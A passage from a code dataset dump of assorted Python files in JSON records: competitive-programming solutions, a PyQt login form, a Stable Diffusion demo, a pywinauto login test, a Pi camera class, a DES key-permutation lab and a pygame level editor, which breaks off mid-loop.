range(3):\n s = input().split()\n x.append(s[0])\n y.append(s[1])\n\nfor p in x:\n if x.count(p) <= 1:\n x.append(p)\n break\n\nfor q in y:\n if y.count(q) <= 1:\n y.append(q)\n break\n\nprint(f'{x[-1]} {y[-1]}')\n","repo_name":"beyondthemist/Problem-solving-solution","sub_path":"BAEKJOON/03009/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1672210726","text":"import sys\r\n\r\nN = int(input())\r\ninfo = []\r\nfor _ in range(N):\r\n info.append(list(map(int, sys.stdin.readline().strip().split())))\r\n\r\ninfo.sort(key=lambda i: i[2], reverse=True)\r\n\r\ngold, silver = [info[0][0], info[0][1]], [info[1][0], info[1][1]]\r\n\r\nbronze = []\r\nif gold[0] != silver[0]:\r\n bronze = [info[2][0], info[2][1]]\r\nelse:\r\n filtered = [x for x in info if x[0] != gold[0]]\r\n bronze = [filtered[0][0], filtered[0][1]]\r\n\r\nprint(*gold)\r\nprint(*silver)\r\nprint(*bronze)\r\n","repo_name":"slackjawed12/codetest","sub_path":"백준/Silver/2535. 아시아 정보올림피아드/아시아 정보올림피아드.py","file_name":"아시아 정보올림피아드.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42220141110","text":"import sys\nfrom loginScreen import loginScreen\nfrom createUser import Ui_MainWindow\nfrom PyQt5 import QtCore, QtWidgets\nimport database as db\n\nclass Main(QtWidgets.QMainWindow):\n def __init__(self, parent=None):\n super(Main, self).__init__()\n \n # build ui\n self.ui = loginScreen()\n self.ui.setupUi(self)\n\n # connect signals\n self.ui.pushButton.clicked.connect(self.on_login_button)\n self.ui.pushButton_2.clicked.connect(self.on_singup_button)\n self.ui.pushButton_3.clicked.connect(self.on_exit_button)\n\n def on_singup_button(self):\n self.dialog = Ui_MainWindow()\n self.dialog.setupUi(self.dialog)\n self.dialog.show() \n\n self.dialog.pushButton.clicked.connect(self.on_register_button)\n self.dialog.pushButton_2.clicked.connect(self.on_back_button)\n\n def on_exit_button(self):\n sys.exit()\n\n def on_back_button(self):\n self.dialog.close()\n \n def on_register_button(self):\n u = self.dialog.lineEdit.text()\n p = self.dialog.lineEdit_2.text()\n e = self.dialog.lineEdit_3.text()\n n = self.dialog.lineEdit_4.text()\n\n db.createUser(u, p, e, n)\n\n def on_login_button(self):\n if db.contains(self.ui.lineEdit.text(), self.ui.lineEdit_2.text()):\n print(\"it is there\")\n else:\n print(\"it's not in the database\")\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n main = Main()\n main.show()\n sys.exit(app.exec_())","repo_name":"sorazy/vets-and-pets","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"233668848","text":"# on google colab make runtime type to GPU\n# !pip install --upgrade keras-cv\n\n# Model\nfrom tensorflow import keras\nimport keras_cv\nkeras.mixed_precision.set_global_policy(\"mixed_float16\")\n\n# Visualization\nimport matplotlib.pyplot as plt\n\n# Save the image\nfrom PIL import Image\n\n# Create a model\nmodel = keras_cv.models.StableDiffusion(img_height=512, \n img_width=512,\n jit_compile=True)\ndef plot_images(images):\n # Set figure size\n plt.figure(figsize=(20, 20))\n # Loop through each image\n for i in range(len(images)):\n # Subplot setup\n ax = plt.subplot(1, len(images), i + 1)\n # Plot each image\n plt.imshow(images[i])\n # Do not show axis\n plt.axis(\"off\")\n\n\n# Create images from text\nimages = model.text_to_image(prompt=\"Max in his cozy little hole in the wall\",\n batch_size=2)\n\n# Plot the images\nplot_images(images)\n","repo_name":"ebdeuslave/public_apps","sub_path":"ai_pic_generator.py","file_name":"ai_pic_generator.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31438658764","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 4 16:12:44 2023\n\n@author: PC\n\"\"\"\n\nimport numpy as np\n\n# Example arrays\narray1 = np.array([[0.1, 0.6],\n [0.3, 0.8]])\n\narray2 = np.array([[0.4, 0.2],\n [0.7, 0.9]])\n\narray3 = np.array([[0.2, 0.3],\n [0.6, 0.5]])\n\narray4 = np.array([[0.5, 0.2],\n [0.1, 0.4]])\n\narray5 = np.array([[0.5, 0.1],\n [0.9, 0.7]])\n\n# List of arrays\narrays = [array1, array2, array3, array4, array5]\n\n# Convert the list of arrays into a single NumPy array\narrays = np.array(arrays)\n\n# Find the maximum values along the specified axis (axis=0 for elementwise comparison)\nmax_values = np.max(arrays, axis=0)\n\n# Create a mask indicating where the maximum values are above 0.5\nmask = max_values > 0.5\n\n# Initialize an output array with zeros\noutput = np.zeros_like(max_values)\n\n# Assign values based on the conditions\nfor i in range(len(arrays)):\n output[np.logical_and(mask, max_values == arrays[i])] = i + 1\n\n# Print the resulting output array\nprint(output)","repo_name":"andreasaspe/Thesis_code","sub_path":"Other_scripts/How_the_logic_works_in_finding_full_segmentation.py","file_name":"How_the_logic_works_in_finding_full_segmentation.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42642258417","text":"def areInc(guess):\n last = -1\n for d in str(guess):\n if int(d) < last:\n return False\n last = int(d)\n return True\n\ndef existSame(guess):\n last = \"A\"\n for d in str(guess):\n if d == last:\n return True\n last = d\n return False\n\ndef existSame2(guess):\n last = \"A\"\n foundPair = False\n tooMany = False\n for d in str(guess):\n if d == last:\n if foundPair == True:\n tooMany = True\n else:\n foundPair = True\n elif foundPair == True and tooMany == False:\n return True\n else:\n foundPair = False\n tooMany = False\n last = d\n return foundPair == True and tooMany == False\n\ndef checkGuess(guess):\n return areInc(guess) and existSame2(guess)\n\nwith open(\"4.input.txt\", \"r\") as f:\n range = f.read().split(\"-\")\n min = int(range[0])\n max = int(range[1])\n\n# min = 112233\n# max = 112233\n\nguess = 0\nif guess < min:\n guess = min\n\npossibleCount = 0\nwhile guess <= max:\n if checkGuess(guess) == True:\n possibleCount += 1\n guess += 1\nprint(\"Possible passwords {0}\".format(possibleCount))\n\n# P1\n\n# L 2185\n# H 2269\n# C 2220\n\n# P2\n\n# C 1515","repo_name":"hotscotch92/advent-of-code","sub_path":"2019/4 - password/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"549458618","text":"from pywinauto import Application, WindowSpecification\nfrom time import sleep\nfrom config.operation_yaml import OperathionYAML\nimport allure\nimport pytest\nimport os\n\n# 参数\nteacher_login_data = OperathionYAML().read_yaml('teacher_login.yaml')\npath = teacher_login_data['init']['path']\nphone_num = teacher_login_data['login_success']['phone_num']\ncaptcha = teacher_login_data['login_success']['captcha']\n\n\n@allure.feature('教师端登录')\nclass TestTeacherLogin:\n @classmethod\n def setup_class(cls):\n # 启动未打开的客户端\n cls.app = Application(backend='uia').start(path)\n\n # 选择首页主窗口\n cls.dlg = cls.app['员工登录 - 贝尔云课堂']\n # 首页子窗口\n cls.document = cls.dlg.window(control_type='Document')\n cls.titleBar = cls.dlg.window(control_type='TitleBar')\n # self.document.print_control_identifiers()\n\n # 登录成功\n @allure.step('登录成功')\n # @pytest.mark.denpendency(name='teacher_login')\n @pytest.mark.run(order=1)\n def test_login_success(self):\n # 输入账号密码,点击登录\n input_phone = self.document.child_window(title=\"请输入手机号\", control_type=\"Edit\")\n input_phone.wait('ready')\n # WindowSpecification.print_control_identifiers(input_phone)\n input_phone.type_keys(phone_num)\n # 验证码\n input_captcha = self.document.child_window(control_type='Table').child_window(title=\"请输入验证码\", control_type=\"Edit\")\n input_captcha.wait('ready')\n input_captcha.type_keys(captcha)\n # 登录按钮\n login_btn = self.document.child_window(title=\"登 录\", control_type=\"Button\")\n login_btn.click()\n\n # 等待插件安装成功\n sleep(40)\n\n\nif __name__ == '__main__':\n pytest.main(['testTeacherLogin.py'])\n\n\n","repo_name":"weilutao/pc_autotest","sub_path":"testcase/pywinauto/teacher/testTeacherLogin.py","file_name":"testTeacherLogin.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40849432686","text":"import io\nimport os\nimport logging\nfrom threading import Condition\nimport numpy as np\nimport picamera\n\nclass Camera(object):\n\n FFMPEG_CMD = 'ffmpeg'\n PHOTO_FILE_EXT = \".jpg\"\n VIDEO_FILE_EXT = \".mp4\"\n VIDEO_FILE_EXT_H264 = '.h264'\n\n class StreamingOutputMJPEG(object):\n def __init__(self):\n self.frame = None\n self.buffer = io.BytesIO()\n self.condition = Condition()\n\n def write(self, buf):\n if buf.startswith(b'\\xff\\xd8'):\n # New frame, copy the existing buffer's content and notify all\n # clients it's available\n self.buffer.truncate()\n with self.condition:\n self.frame = self.buffer.getvalue()\n self.condition.notify_all()\n self.buffer.seek(0)\n return self.buffer.write(buf)\n\n class StreamingOutputBGR(object):\n def __init__(self, resolution):\n self.frame = None\n self.condition = Condition()\n self.resolution = resolution\n self.count = 0\n\n def write(self, buf):\n with self.condition:\n frame = np.frombuffer(buf, dtype=np.uint8)\n self.frame = frame.reshape(self.resolution[1], self.resolution[0], 4)\n self.frame = np.delete(self.frame, 3, 2)\n self.condition.notify_all()\n return len(buf)\n\n def __init__(self, props):\n logging.info(\"camera init\")\n self.camera = picamera.PiCamera()\n self.camera.resolution = (props.get('width', 640), props.get('height', 512))\n self.out_rgb_resolution = (int(self.camera.resolution[0] / int(props.get('cv_image_factor', 4))), int(self.camera.resolution[1] / int(props.get('cv_image_factor', 4))))\n self.camera.framerate = float(props.get('framerate', 20))\n self.camera.exposure_mode = props.get('exposure_mode', \"auto\")\n self.output_mjpeg = self.StreamingOutputMJPEG()\n self.output_bgr = self.StreamingOutputBGR(self.out_rgb_resolution)\n self.h264_encoder = None\n self.recording = None\n self.video_filename = None\n self._jpeg_quality = props.get('jpeg_quality', 20)\n self._jpeg_bitrate = props.get('jpeg_bitrate', 5000000)\n\n def video_rec(self, filename):\n self.video_filename = filename[:filename.rfind(\".\")]\n self.camera.start_recording(self.video_filename + self.VIDEO_FILE_EXT_H264, format=\"h264\", quality=23, splitter_port=2)\n\n def video_stop(self):\n logging.debug(\"video_stop\")\n self.camera.stop_recording(2)\n\n # pack in mp4 container\n params = \" -loglevel quiet -stats -framerate \" + str(self.camera.framerate) + \\\n \" -i \" + self.video_filename + self.VIDEO_FILE_EXT_H264 + \\\n \" -c copy \" + self.video_filename + self.VIDEO_FILE_EXT\n\n os.system(self.FFMPEG_CMD + params)\n # remove h264 file\n os.remove(self.video_filename + self.VIDEO_FILE_EXT_H264)\n\n def grab_start(self):\n logging.debug(\"grab_start\")\n self.camera.start_recording(self.output_mjpeg, format=\"mjpeg\", splitter_port=0, bitrate=self._jpeg_bitrate)\n self.camera.start_recording(self.output_bgr, format=\"bgra\", splitter_port=1, resize=self.out_rgb_resolution)\n\n def grab_stop(self):\n logging.debug(\"grab_stop\")\n\n self.camera.stop_recording(0)\n self.camera.stop_recording(1)\n\n def get_image_jpeg(self):\n with self.output_mjpeg.condition:\n self.output_mjpeg.condition.wait()\n return self.output_mjpeg.frame\n\n def get_image_bgr(self):\n with self.output_bgr.condition:\n self.output_bgr.condition.wait()\n return self.output_bgr.frame\n\n def set_overlay_text(self, text):\n try:\n self.camera.annotate_text = text\n except picamera.PiCameraValueError:\n logging.info(\"PiCameraValueError\")\n\n def close(self):\n self.camera.close()\n","repo_name":"CoderBotOrg/backend","sub_path":"coderbot/cv/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"72"} +{"seq_id":"72437525034","text":"\nimport tensorflow as tf\n#from keras.models import load_model \n#import keras\n#mnist = tf.keras.datasets.mnist\nimport matplotlib.pyplot as plt\n\nimport numpy as np\n\n\n\ndef Deep_neural_net(Z1,Z2):\n model = tf.keras.models.Sequential([tf.keras.layers.Flatten()])\n #model =tf.keras.layers.Flatten()\n model.add(tf.keras.layers.Dense(1000,kernel_initializer='uniform',activation=tf.nn.relu))\n model.add(tf.keras.layers.Dense(1000,kernel_initializer='uniform',activation=tf.nn.relu))\n model.add(tf.keras.layers.Dense(1000,kernel_initializer='uniform',activation=tf.nn.relu))\n model.add(tf.keras.layers.Dense(1000,kernel_initializer='uniform',activation=tf.nn.relu))\n \n model.add(tf.keras.layers.Dense(1,activation=tf.nn.sigmoid))\n \n '''\n model.add(tf.keras.layers.Embedding(10,1))\n model.add(tf.keras.layers.LSTM(128,dropout=0.2,recurrent_dropout=0.2))\n model.add(tf.keras.layers.Dense(1, activation=tf.nn.sigmoid))\n '''\n \n \n \n '''\n model = tf.keras.models.Sequential([\n tf.keras.layers.Flatten(),\n tf.keras.layers.Dense(1000, activation=tf.nn.relu),\n tf.keras.layers.Dense(1000, activation=tf.nn.relu),\n tf.keras.layers.Dense(1000, activation=tf.nn.relu),\n tf.keras.layers.Dense(1000, activation=tf.nn.relu),\n \n #tf.keras.layers.Dense(10, activation=tf.nn.relu),\n #tf.keras.layers.Dense(100, activation=tf.nn.relu),\n \n \n tf.keras.layers.Dense(1, activation=tf.nn.sigmoid)\n ])\n \n '''\n model.compile(optimizer='adamax',\n loss='binary_crossentropy',\n metrics=['mae'])\n\n '''\n model.compile(optimizer='adamax',\n loss='mse',\n metrics=['mae'])\n '''\n\n\n model.fit(Z1, Z2, epochs=200)\n #tf.keras.models.save('Neural_Network.h5')\n \n\n return model\n\n\n\n\n\n\n\n\nZ1=np.random.rand(50,10,2)\nZ2=np.zeros((50,1))\n\nprint(Z1)\n#Z2=np.sum(np.all(Z1)**2)\n\n#'''\nprint(np.shape(Z1))\n#print(Z1)\nfor i in range(len(Z2)):\n Z2[i]=0\n for j in range(len(Z1[i])):\n Z2[i]+=((Z1[i][j][0]**2+Z1[i][j][1]**2)**0.5)/10\n \n#'''\n\n\n#plt.scatter(Z1,Z2,s=5)\n#plt.show()\n\n\nmodel=Deep_neural_net(Z1,Z2)\n\nZ1=np.random.rand(20,10,2)\nZ2=np.zeros((20,1))\n\n#Z2=np.sum(np.all(Z1)**2)\n\n#'''\nprint(np.shape(Z1))\n#print(Z1)\nfor i in range(len(Z2)):\n Z2[i]=0\n for j in range(len(Z1[i])):\n Z2[i]+=((Z1[i][j][0]**2+Z1[i][j][1]**2)**0.5)/10\n#'''\n\n#model.load_model('Neural_Network.h5')\n\nAnswer=model.predict(Z1)\n\nscore=model.evaluate(Z1,Z2)\n\nplt.plot(Z2)\nplt.plot(Answer)\nprint(score)\n#plt.scatter(Z1,Answer,s=10)\n#plt.scatter(Z1,Z2,s=5)\n\nplt.show()\n\n#print(model.evaulate())\n\n\n#model.output_shape\n#model.get_weights()\n#model.save('models.h5')","repo_name":"joejoseph007/2018_10_18","sub_path":"1./test9.py","file_name":"test9.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16000051967","text":"from pyspark.ml.clustering import KMeans, BisectingKMeans\n\n\nclass Clustering:\n df = None\n\n def __init__(self, df):\n self.df = df\n\n def k_means(self, k):\n print('\\nK-Means - ' + str(k))\n kmeans = KMeans().setK(k).setSeed(1)\n model = kmeans.fit(self.df.select('features'))\n\n transformed = model.transform(self.df)\n transformed.groupBy(\"prediction\").count().show()\n\n centers = model.clusterCenters()\n self.print_centers(centers)\n\n def bisecting_k_means(self, k):\n print('\\nBisecting K-Means - ' + str(k))\n kmeans = BisectingKMeans().setK(k).setSeed(1)\n model = kmeans.fit(self.df.select('features'))\n\n transformed = model.transform(self.df)\n transformed.groupBy(\"prediction\").count().show()\n\n centers = model.clusterCenters()\n self.print_centers(centers)\n\n def print_centers(self, centers):\n for center in centers:\n print(center)\n \n\n","repo_name":"pawelciupka/STUDIA-BigData","sub_path":"Project/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29813075449","text":"\"\"\"\nFound usages are returned from all core search functions as async generators\nwhich the methods in this module can consume and loop through to output in\ndifferent formats.\n\"\"\"\n\nimport json\n\nfrom aiostream import stream\n\nseparators_with_no_spaces_to_match_jq_compact_format = (\",\", \":\")\n\n\ndef as_json_line(usage):\n return json.dumps(\n usage, separators=separators_with_no_spaces_to_match_jq_compact_format\n )\n\n\nasync def output_to_stdout(all_usages):\n async for usage in all_usages:\n print(as_json_line(usage))\n\n\nasync def output_to_file(all_usages, output_file):\n from aiofile import async_open\n\n async with async_open(output_file, \"w\") as file:\n async for usage in all_usages:\n await file.write(f\"{as_json_line(usage)}\\n\")\n\n\nasync def output_to_sqlite(all_usages, database, table, batch_size):\n \"\"\"\n If you need more flexibility you can output to stdout or file and pipe\n that into the sqlite-utils cli directly instead.\n \"\"\"\n from sqlite_utils import Database\n\n db = Database(database, recreate=False)\n\n chunked_usages = stream.chunks(all_usages, batch_size)\n async with chunked_usages.stream() as usages_stream:\n async for usages in usages_stream:\n db[table].insert_all(usages, batch_size=batch_size)\n","repo_name":"hmrc/play-frontend-find-usages","sub_path":"find_usages/outputs.py","file_name":"outputs.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22129246646","text":"\"\"\"\nFirst tryyy\n\nApproach, use a list def dict and create a frequency array, maintaining the key for the max\n\n\"\"\"\n\ndef solution(inputArray):\n if len(inputArray) == 1: return inputArray\n \n import collections\n freqlist = collections.defaultdict(list)\n maxlen = 0\n \n for s in inputArray:\n freqlist[len(s)].append(s)\n if len(s) > maxlen: maxlen = len(s)\n \n return freqlist[maxlen]\n","repo_name":"ShockleyJE/codesignal","sub_path":"Intro/level3/allLongestStrings.py","file_name":"allLongestStrings.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41816248275","text":"from to_binary import convert_to_binary\r\nfrom random_key import create_random_key\r\n\r\n\r\ndef convert_to_kplus(key_binary):\r\n key_plus = ''\r\n\r\n global pc1\r\n pc1 = [\r\n 57, 49, 41, 33, 25, 17, 9, 1,\r\n 58, 50, 42, 34, 26, 18, 10, 2,\r\n 59, 51, 43, 35, 27, 19, 11, 3,\r\n 60, 52, 44, 36, 63, 55, 47, 39,\r\n 31, 23, 15, 7, 62, 54, 46, 38,\r\n 30, 22, 14, 6, 61, 53, 45, 37,\r\n 29, 21, 13, 5, 28, 20, 12, 4\r\n ]\r\n\r\n for value in pc1:\r\n key_plus += key_binary[value]\r\n\r\n return key_plus\r\n\r\n\r\ndef retrieve_key():\r\n while True:\r\n choice = input(\"Enter (e) for entering a key, or (r) to randomly generate one: \")\r\n if choice == \"e\":\r\n key = input(\"Enter your 8-symbols key: \")\r\n if len(key) == 8: \r\n break\r\n else:\r\n print(\"Invalid key - 8 symbols required.\\n\")\r\n\r\n elif choice == \"r\":\r\n key = create_random_key(8)\r\n break\r\n\r\n else:\r\n print(\"No such option available\\n\")\r\n\r\n return key\r\n\r\n\r\ndef print_steps(key, key_binary, key_plus):\r\n print(f\"\\nOriginal Key: {key} Length: {len(key)}\")\r\n print(f\"Binary Key: {key_binary} Length: {len(key_binary)}\")\r\n print(f\"K+: {key_plus} Length: {len(key_plus)}\")\r\n\r\n print(\"\\nPC-1 Permutation Table:\")\r\n for i in range(0, len(pc1), 8):\r\n row = pc1[i:i + 8]\r\n for bit in row:\r\n print(f\"{bit:2}\", end=\" \")\r\n print()\r\n print()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\"\\nLab 4 - Given the key of the DES algorithm (8 symbols), determine K+.\\n\")\r\n key = retrieve_key()\r\n key_binary = convert_to_binary(key) \r\n key_plus = convert_to_kplus(key_binary)\r\n print_steps(key, key_binary, key_plus)\r\n","repo_name":"zly-VON/CS---Labs","sub_path":"Lab#4 - DES Algorithm/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31901900975","text":"import csv\nfrom os import getcwd, path\n\nimport pygame\n\nfrom button import Button\n\n\npygame.init()\n\nclock = pygame.time.Clock()\nFPS = 60\n\n# game window\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 640\nLOWER_MARGIN = 100\nSIDE_MARGIN = 400\n\nscreen = pygame.display.set_mode((SCREEN_WIDTH + SIDE_MARGIN, SCREEN_HEIGHT + LOWER_MARGIN))\npygame.display.set_caption('Level Editor')\n\n# define game variables\nROWS = 150\nTILE_SIZE = 40\nLOWER_TILE_TYPES = 67\nDECOR_TILE_TYPES = 11\nUPPER_TILE_TYPES = 6\nCOLS = 150\ncurrent_tile = 0\nlevel = 1\nlayer = 'lower'\ncurrent_layer_btn = 0\nscroll_left = False\nscroll_right = False\nscroll_up = False\nscroll_down = False\nscroll = [0, 0]\nscroll_speed = 1\n\n# define filepaths\nres_dir = path.join(path.dirname(__file__))\nimg_dir = path.join(res_dir, 'img')\nlvl_dir = path.join(getcwd(), 'levels')\nlower_tile_dir = path.join(img_dir, 'tile', 'lower')\ndecor_tile_dir = path.join(img_dir, 'tile', 'decor')\nupper_tile_dir = path.join(img_dir, 'tile', 'upper')\n\n# load layers button images\nlower_btn_img = pygame.image.load(path.join(img_dir, 'lower-btn.png')).convert_alpha()\ndecor_btn_img = pygame.image.load(path.join(img_dir, 'decor-btn.png')).convert_alpha()\nupper_btn_img = pygame.image.load(path.join(img_dir, 'upper-btn.png')).convert_alpha()\n\n# define empty tile lists\nlower_img_list = []\ndecor_img_list = []\nupper_img_list = []\n\n# store lower tiles in a list\nfor x in range(LOWER_TILE_TYPES):\n img = pygame.image.load(path.join(lower_tile_dir, f'{x}.png')).convert_alpha()\n img = pygame.transform.scale(img, (TILE_SIZE, TILE_SIZE))\n lower_img_list.append(img)\n\n# store decor tiles in a list\nfor x in range(DECOR_TILE_TYPES):\n img = pygame.image.load(path.join(decor_tile_dir, f'{x}.png')).convert_alpha()\n img = pygame.transform.scale(img, (TILE_SIZE, TILE_SIZE))\n decor_img_list.append(img)\n\n# store upper tiles in a list\nfor x in range(UPPER_TILE_TYPES):\n img = pygame.image.load(path.join(upper_tile_dir, f'{x}.png')).convert_alpha()\n img = pygame.transform.scale(img, (TILE_SIZE, TILE_SIZE))\n upper_img_list.append(img)\n\nsave_img = pygame.image.load(path.join(img_dir, 'save_btn.png')).convert_alpha()\nload_img = pygame.image.load(path.join(img_dir, 'load_btn.png')).convert_alpha()\n\n# define colours\nBG = (35, 35, 35)\nGREEN = (144, 201, 120)\nWHITE = (255, 255, 255)\nRED = (200, 25, 25)\n\n# define font\nfont = pygame.font.SysFont('Futura', 30)\n\n# create empty tile lists\nlower_world_data = []\ndecor_world_data = []\nupper_world_data = []\n\n# lower world layer\nfor row in range(ROWS):\n r = [-1] * COLS\n lower_world_data.append(r)\n\n# decor world layer\nfor row in range(ROWS):\n r = [-1] * COLS\n decor_world_data.append(r)\n\n# upper world layer\nfor row in range(ROWS):\n r = [-1] * COLS\n upper_world_data.append(r)\n\n\n# function for outputting text onto the screen\ndef draw_text(text, font, text_col, x, y):\n img = font.render(text, True, text_col)\n screen.blit(img, (x, y))\n\n\n# function for drawing background\ndef draw_bg():\n screen.fill(BG)\n\n\n# draw grid\ndef draw_grid():\n # vertical lines\n for c in range(COLS + 1):\n pygame.draw.line(screen, WHITE, (c * TILE_SIZE - scroll[0], 0), (c * TILE_SIZE - scroll[0], SCREEN_HEIGHT))\n # horizontal lines\n for c in range(ROWS + 1):\n pygame.draw.line(screen, WHITE, (0, c * TILE_SIZE - scroll[1]), (SCREEN_WIDTH, c * TILE_SIZE - scroll[1]))\n\n\n# function for drawing the world tiles\ndef draw_world():\n # lower\n for y, row in enumerate(lower_world_data):\n for x, tile in enumerate(row):\n if tile >= 0:\n screen.blit(lower_img_list[tile], (x * TILE_SIZE - scroll[0], y * TILE_SIZE - scroll[1]))\n\n # lower\n for y, row in enumerate(decor_world_data):\n for x, tile in enumerate(row):\n if tile >= 0:\n screen.blit(decor_img_list[tile], (x * TILE_SIZE - scroll[0], y * TILE_SIZE - scroll[1]))\n\n # lower\n for y, row in enumerate(upper_world_data):\n for x, tile in enumerate(row):\n if tile >= 0:\n screen.blit(upper_img_list[tile], (x * TILE_SIZE - scroll[0], y * TILE_SIZE - scroll[1]))\n\n\n# create buttons\nsave_button = Button(SCREEN_WIDTH // 2, SCREEN_HEIGHT + LOWER_MARGIN - 50, save_img, 1)\nload_button = Button(SCREEN_WIDTH // 2 + 200, SCREEN_HEIGHT + LOWER_MARGIN - 50, load_img, 1)\n\n# make a button list\n# layer buttons\nlower_btn = Button(SCREEN_WIDTH + 10, 5, lower_btn_img, 1)\ndecor_btn = Button(SCREEN_WIDTH + 140, 5, decor_btn_img, 1)\nupper_btn = Button(SCREEN_WIDTH + 260, 5, upper_btn_img, 1)\nlayers_btn_list = [lower_btn, decor_btn, upper_btn]\n\n# lower tile buttons\nlower_button_list = []\nbutton_col = 0\nbutton_row = 0\nfor i in range(len(lower_img_list)):\n tile_button = Button(SCREEN_WIDTH + (50 * button_col) + 25, 50 * button_row + 50, lower_img_list[i], 1)\n lower_button_list.append(tile_button)\n button_col += 1\n if button_col == 7:\n button_col = 0\n button_row += 1\n\n# upper tile buttons\ndecor_button_list = []\nbutton_col = 0\nbutton_row = 0\nfor i in range(len(decor_img_list)):\n tile_button = Button(SCREEN_WIDTH + (50 * button_col) + 25, 50 * button_row + 50, decor_img_list[i], 1)\n decor_button_list.append(tile_button)\n button_col += 1\n if button_col == 7:\n button_col = 0\n button_row += 1\n\n# decor tile buttons\nupper_button_list = []\nbutton_col = 0\nbutton_row = 0\nfor i in range(len(upper_img_list)):\n tile_button = Button(SCREEN_WIDTH + (50 * button_col) + 25, 50 * button_row + 50, upper_img_list[i], 1)\n upper_button_list.append(tile_button)\n button_col += 1\n if button_col == 7:\n button_col = 0\n button_row += 1\n\nrun = True\nwhile run:\n\n clock.tick(FPS)\n\n draw_bg()\n draw_grid()\n draw_world()\n\n # draw bottom panel\n pygame.draw.rect(screen, BG, (0, SCREEN_HEIGHT, SCREEN_WIDTH + SIDE_MARGIN, SCREEN_HEIGHT + LOWER_MARGIN))\n\n draw_text(f'Level: {level}', font, WHITE, 10, SCREEN_HEIGHT + LOWER_MARGIN - 90)\n draw_text('Press UP or DOWN to change level', font, WHITE, 10, SCREEN_HEIGHT + LOWER_MARGIN - 60)\n if path.exists(path.join(lvl_dir, f'level{level}_lower_data.csv')):\n draw_text('File already exists, be careful when saving!', font, RED, 400, SCREEN_HEIGHT + LOWER_MARGIN - 80)\n\n # save and load data\n if save_button.draw(screen):\n # save level data\n # lower\n with open(path.join(lvl_dir, f'level{level}_lower_data.csv'), 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n for row in lower_world_data:\n writer.writerow(row)\n\n # decor\n with open(path.join(lvl_dir, f'level{level}_decor_data.csv'), 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n for row in decor_world_data:\n writer.writerow(row)\n\n # upper\n with open(path.join(lvl_dir, f'level{level}_upper_data.csv'), 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',')\n for row in upper_world_data:\n writer.writerow(row)\n\n if load_button.draw(screen):\n # load in level data\n # reset scroll back to the start of the level\n scroll = [0, 0]\n save_trigger = 0\n\n # lower layer\n if path.exists(path.join(lvl_dir, f'level{level}_lower_data.csv')):\n with open(path.join(lvl_dir, f'level{level}_lower_data.csv'), newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for x, row in enumerate(reader):\n for y, tile in enumerate(row):\n lower_world_data[x][y] = int(tile)\n else:\n print(f\"File 'level{level}_lower_data.csv' Doesn't Exist\")\n\n # decor layer\n if path.exists(path.join(lvl_dir, f'level{level}_decor_data.csv')):\n with open(path.join(lvl_dir, f'level{level}_decor_data.csv'), newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for x, row in enumerate(reader):\n for y, tile in enumerate(row):\n decor_world_data[x][y] = int(tile)\n else:\n print(f\"File 'level{level}_decor_data.csv' Doesn't Exist\")\n\n # lower layer\n if path.exists(path.join(lvl_dir, f'level{level}_upper_data.csv')):\n with open(path.join(lvl_dir, f'level{level}_upper_data.csv'), newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n for x, row in enumerate(reader):\n for y, tile in enumerate(row):\n upper_world_data[x][y] = int(tile)\n else:\n print(f\"File 'level{level}_upper_data.csv' Doesn't Exist\")\n\n # draw tile panel and tiles\n pygame.draw.rect(screen, GREEN, (SCREEN_WIDTH, 0, SIDE_MARGIN, SCREEN_HEIGHT))\n\n # choose a layer button\n if lower_btn.draw(screen):\n current_layer_btn = 0\n layer = 'lower'\n current_tile = 0\n elif decor_btn.draw(screen):\n current_layer_btn = 1\n layer = 'decor'\n current_tile = 0\n elif upper_btn.draw(screen):\n current_layer_btn = 2\n layer = 'upper'\n current_tile = 0\n\n # highlight the selected layer button\n pygame.draw.rect(screen, RED, layers_btn_list[current_layer_btn].rect, 3)\n\n # choose a tile from layer tiles\n # lower layer tiles\n if layer == 'lower':\n button_count = 0\n for button_count, i in 